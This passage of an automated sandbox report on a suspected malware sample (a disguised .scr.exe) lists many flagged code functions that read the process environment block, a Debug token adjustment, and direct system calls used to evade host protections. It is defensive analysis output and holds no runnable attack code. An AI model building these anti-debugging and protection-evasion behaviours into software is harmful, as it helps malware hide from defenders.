                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8550 mov eax, dword ptr fs:[00000030h]3_2_014F8550
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8550 mov eax, dword ptr fs:[00000030h]3_2_014F8550
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152656A mov eax, dword ptr fs:[00000030h]3_2_0152656A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152656A mov eax, dword ptr fs:[00000030h]3_2_0152656A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152656A mov eax, dword ptr fs:[00000030h]3_2_0152656A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01586500 mov eax, dword ptr fs:[00000030h]3_2_01586500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4500 mov eax, dword ptr fs:[00000030h]3_2_015C4500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4500 mov eax, dword ptr fs:[00000030h]3_2_015C4500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4500 mov eax, dword ptr fs:[00000030h]3_2_015C4500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4500 mov eax, dword ptr fs:[00000030h]3_2_015C4500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4500 mov eax, dword ptr fs:[00000030h]3_2_015C4500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4500 mov eax, dword ptr fs:[00000030h]3_2_015C4500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4500 mov eax, dword ptr fs:[00000030h]3_2_015C4500
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500535 mov eax, dword ptr fs:[00000030h]3_2_01500535
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500535 mov eax, dword ptr fs:[00000030h]3_2_01500535
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500535 mov eax, dword ptr fs:[00000030h]3_2_01500535
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500535 mov eax, dword ptr fs:[00000030h]3_2_01500535
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500535 mov eax, dword ptr fs:[00000030h]3_2_01500535
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500535 mov eax, dword ptr fs:[00000030h]3_2_01500535
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E53E mov eax, dword ptr fs:[00000030h]3_2_0151E53E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E53E mov eax, dword ptr fs:[00000030h]3_2_0151E53E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E53E mov eax, dword ptr fs:[00000030h]3_2_0151E53E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E53E mov eax, dword ptr fs:[00000030h]3_2_0151E53E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E53E mov eax, dword ptr fs:[00000030h]3_2_0151E53E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A5D0 mov eax, dword ptr fs:[00000030h]3_2_0152A5D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A5D0 mov eax, dword ptr fs:[00000030h]3_2_0152A5D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E5CF mov eax, dword ptr fs:[00000030h]3_2_0152E5CF
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E5CF mov eax, dword ptr fs:[00000030h]3_2_0152E5CF
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F65D0 mov eax, dword ptr fs:[00000030h]3_2_014F65D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F25E0 mov eax, dword ptr fs:[00000030h]3_2_014F25E0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151E5E7 mov eax, dword ptr fs:[00000030h]3_2_0151E5E7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C5ED mov eax, dword ptr fs:[00000030h]3_2_0152C5ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C5ED mov eax, dword ptr fs:[00000030h]3_2_0152C5ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F2582 mov eax, dword ptr fs:[00000030h]3_2_014F2582
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F2582 mov ecx, dword ptr fs:[00000030h]3_2_014F2582
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E59C mov eax, dword ptr fs:[00000030h]3_2_0152E59C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01524588 mov eax, dword ptr fs:[00000030h]3_2_01524588
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015145B1 mov eax, dword ptr fs:[00000030h]3_2_015145B1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015145B1 mov eax, dword ptr fs:[00000030h]3_2_015145B1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015705A7 mov eax, dword ptr fs:[00000030h]3_2_015705A7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015705A7 mov eax, dword ptr fs:[00000030h]3_2_015705A7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015705A7 mov eax, dword ptr fs:[00000030h]3_2_015705A7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151245A mov eax, dword ptr fs:[00000030h]3_2_0151245A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015AA456 mov eax, dword ptr fs:[00000030h]3_2_015AA456
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152E443 mov eax, dword ptr fs:[00000030h]3_2_0152E443
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E645D mov eax, dword ptr fs:[00000030h]3_2_014E645D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151A470 mov eax, dword ptr fs:[00000030h]3_2_0151A470
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151A470 mov eax, dword ptr fs:[00000030h]3_2_0151A470
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151A470 mov eax, dword ptr fs:[00000030h]3_2_0151A470
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C460 mov ecx, dword ptr fs:[00000030h]3_2_0157C460
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528402 mov eax, dword ptr fs:[00000030h]3_2_01528402
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528402 mov eax, dword ptr fs:[00000030h]3_2_01528402
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528402 mov eax, dword ptr fs:[00000030h]3_2_01528402
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EC427 mov eax, dword ptr fs:[00000030h]3_2_014EC427
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EE420 mov eax, dword ptr fs:[00000030h]3_2_014EE420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EE420 mov eax, dword ptr fs:[00000030h]3_2_014EE420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014EE420 mov eax, dword ptr fs:[00000030h]3_2_014EE420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01576420 mov eax, dword ptr fs:[00000030h]3_2_01576420
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F04E5 mov ecx, dword ptr fs:[00000030h]3_2_014F04E5
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015AA49A mov eax, dword ptr fs:[00000030h]3_2_015AA49A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015244B0 mov ecx, dword ptr fs:[00000030h]3_2_015244B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F64AB mov eax, dword ptr fs:[00000030h]3_2_014F64AB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157A4B0 mov eax, dword ptr fs:[00000030h]3_2_0157A4B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01574755 mov eax, dword ptr fs:[00000030h]3_2_01574755
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532750 mov eax, dword ptr fs:[00000030h]3_2_01532750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532750 mov eax, dword ptr fs:[00000030h]3_2_01532750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157E75D mov eax, dword ptr fs:[00000030h]3_2_0157E75D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152674D mov esi, dword ptr fs:[00000030h]3_2_0152674D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152674D mov eax, dword ptr fs:[00000030h]3_2_0152674D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152674D mov eax, dword ptr fs:[00000030h]3_2_0152674D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0750 mov eax, dword ptr fs:[00000030h]3_2_014F0750
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500770 mov eax, dword ptr fs:[00000030h]3_2_01500770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8770 mov eax, dword ptr fs:[00000030h]3_2_014F8770
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01520710 mov eax, dword ptr fs:[00000030h]3_2_01520710
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C700 mov eax, dword ptr fs:[00000030h]3_2_0152C700
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0710 mov eax, dword ptr fs:[00000030h]3_2_014F0710
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156C730 mov eax, dword ptr fs:[00000030h]3_2_0156C730
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152273C mov eax, dword ptr fs:[00000030h]3_2_0152273C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152273C mov ecx, dword ptr fs:[00000030h]3_2_0152273C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152273C mov eax, dword ptr fs:[00000030h]3_2_0152273C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C720 mov eax, dword ptr fs:[00000030h]3_2_0152C720
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C720 mov eax, dword ptr fs:[00000030h]3_2_0152C720
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FC7C0 mov eax, dword ptr fs:[00000030h]3_2_014FC7C0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015707C3 mov eax, dword ptr fs:[00000030h]3_2_015707C3
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F47FB mov eax, dword ptr fs:[00000030h]3_2_014F47FB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F47FB mov eax, dword ptr fs:[00000030h]3_2_014F47FB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157E7E1 mov eax, dword ptr fs:[00000030h]3_2_0157E7E1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015127ED mov eax, dword ptr fs:[00000030h]3_2_015127ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015127ED mov eax, dword ptr fs:[00000030h]3_2_015127ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015127ED mov eax, dword ptr fs:[00000030h]3_2_015127ED
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159678E mov eax, dword ptr fs:[00000030h]3_2_0159678E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F07AF mov eax, dword ptr fs:[00000030h]3_2_014F07AF
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A47A0 mov eax, dword ptr fs:[00000030h]3_2_015A47A0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150C640 mov eax, dword ptr fs:[00000030h]3_2_0150C640
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01522674 mov eax, dword ptr fs:[00000030h]3_2_01522674
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A660 mov eax, dword ptr fs:[00000030h]3_2_0152A660
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A660 mov eax, dword ptr fs:[00000030h]3_2_0152A660
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B866E mov eax, dword ptr fs:[00000030h]3_2_015B866E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B866E mov eax, dword ptr fs:[00000030h]3_2_015B866E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01532619 mov eax, dword ptr fs:[00000030h]3_2_01532619
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150260B mov eax, dword ptr fs:[00000030h]3_2_0150260B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E609 mov eax, dword ptr fs:[00000030h]3_2_0156E609
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F262C mov eax, dword ptr fs:[00000030h]3_2_014F262C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01526620 mov eax, dword ptr fs:[00000030h]3_2_01526620
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528620 mov eax, dword ptr fs:[00000030h]3_2_01528620
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0150E627 mov eax, dword ptr fs:[00000030h]3_2_0150E627
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0152A6C7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152A6C7 mov eax, dword ptr fs:[00000030h]3_2_0152A6C7
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E6F2 mov eax, dword ptr fs:[00000030h]3_2_0156E6F2
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015706F1 mov eax, dword ptr fs:[00000030h]3_2_015706F1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015706F1 mov eax, dword ptr fs:[00000030h]3_2_015706F1
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F4690 mov eax, dword ptr fs:[00000030h]3_2_014F4690
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F4690 mov eax, dword ptr fs:[00000030h]3_2_014F4690
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015266B0 mov eax, dword ptr fs:[00000030h]3_2_015266B0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152C6A6 mov eax, dword ptr fs:[00000030h]3_2_0152C6A6
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01570946 mov eax, dword ptr fs:[00000030h]3_2_01570946
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4940 mov eax, dword ptr fs:[00000030h]3_2_015C4940
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01594978 mov eax, dword ptr fs:[00000030h]3_2_01594978
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01594978 mov eax, dword ptr fs:[00000030h]3_2_01594978
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C97C mov eax, dword ptr fs:[00000030h]3_2_0157C97C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01516962 mov eax, dword ptr fs:[00000030h]3_2_01516962
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01516962 mov eax, dword ptr fs:[00000030h]3_2_01516962
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01516962 mov eax, dword ptr fs:[00000030h]3_2_01516962
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E mov eax, dword ptr fs:[00000030h]3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E mov edx, dword ptr fs:[00000030h]3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0153096E mov eax, dword ptr fs:[00000030h]3_2_0153096E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157C912 mov eax, dword ptr fs:[00000030h]3_2_0157C912
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E8918 mov eax, dword ptr fs:[00000030h]3_2_014E8918
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014E8918 mov eax, dword ptr fs:[00000030h]3_2_014E8918
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E908 mov eax, dword ptr fs:[00000030h]3_2_0156E908
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156E908 mov eax, dword ptr fs:[00000030h]3_2_0156E908
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0158892B mov eax, dword ptr fs:[00000030h]3_2_0158892B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157892A mov eax, dword ptr fs:[00000030h]3_2_0157892A
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015249D0 mov eax, dword ptr fs:[00000030h]3_2_015249D0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtClose: Direct from: 0x76F02B6C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtCreateKey: Direct from: 0x76F02C6C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtSetInformationThread: Direct from: 0x76F02B4C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtOpenSection: Direct from: 0x76F02E0C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtSetInformationThread: Direct from: 0x76EF63F9
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
